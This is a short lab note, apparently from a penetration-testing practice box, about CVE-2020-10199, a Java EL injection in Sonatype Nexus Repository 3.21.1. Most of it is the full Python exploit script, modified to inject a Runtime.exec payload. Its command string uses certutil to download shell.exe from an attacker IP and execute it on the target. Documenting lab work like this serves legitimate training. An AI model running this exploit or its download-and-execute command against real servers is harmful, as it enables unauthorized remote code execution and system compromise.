InfoSec LAB

Billyboss_CVE-2020-10199

Created: 2 min read

CVE-2020-10199

A vulnerability was found in Sonatype Nexus Repository up to 3.21.1. It has been declared as critical. This vulnerability affects an unknown part of the component JavaEL Handler. The manipulation with an unknown input leads to a authorization vulnerability. The CWE definition for the vulnerability is CWE-862. The product does not perform an authorization check when an actor attempts to access a resource or perform an action. As an impact it is known to affect confidentiality, integrity, and availability.

Exploit

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/billyboss]
└─$ searchsploit -m java/webapps/49385.py ; mv 49385.py CVE-2020-10199.py
  Exploit: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
      URL: https://www.exploit-db.com/exploits/49385
     Path: /usr/share/exploitdb/exploits/java/webapps/49385.py
    Codes: CVE-2020-10199
 Verified: True
File Type: Unicode text, UTF-8 text
Copied to: /home/kali/PEN-200/PG_PRACTICE/billyboss/49385.py

Exploit locally available However, it requires a little modification to fit the target environment

Modification

# Exploit Title: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
# Exploit Author: 1F98D
# Original Author: Alvaro Muñoz
# Date: 27 May 2020
# Vendor Hompage: https://www.sonatype.com/
# CVE: CVE-2020-10199
# Tested on: Windows 10 x64
# References:
# https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
# https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
#
# Nexus Repository Manager 3 versions 3.21.1 and below are vulnerable
# to Java EL injection which allows a low privilege user to remotely
# execute code on the target server.
#
#!/usr/bin/python3
 
import sys
import base64
import requests
 
URL='http://192.168.148.61:8081'
CMD='cmd /c certutil.exe -urlcache -split -f http://192.168.45.245/shell.exe %TEMP%//shell.exe && %TEMP%//shell.exe'
USERNAME='nexus'
PASSWORD='nexus'
 
s = requests.Session()
print('Logging in')
body = {
    'username': base64.b64encode(USERNAME.encode('utf-8')).decode('utf-8'),
    'password': base64.b64encode(PASSWORD.encode('utf-8')).decode('utf-8')
}
r = s.post(URL + '/service/rapture/session',data=body)
if r.status_code != 204:
    print('Login unsuccessful')
    print(r.status_code)
    sys.exit(1)
print('Logged in successfully')
 
body = {
    'name': 'internal',
    'online': True,
    'storage': {
        'blobStoreName': 'default',
        'strictContentTypeValidation': True
    },
    'group': {
        'memberNames': [
            '$\\A{\'\'.getClass().forName(\'java.lang.Runtime\').getMethods()[6].invoke(null).exec(\''+CMD+'\')}"'
        ]
    },
}
r = s.post(URL + '/service/rest/beta/repositories/go/group', json=body)
if 'java.lang.ProcessImpl' in r.text:
    print('Command executed')
    sys.exit(0)
else:
    print('Error executing command, the following was returned by Nexus')
    print(r.text)

Modified to download and execute the payload

Interactive Graph View

Backlinks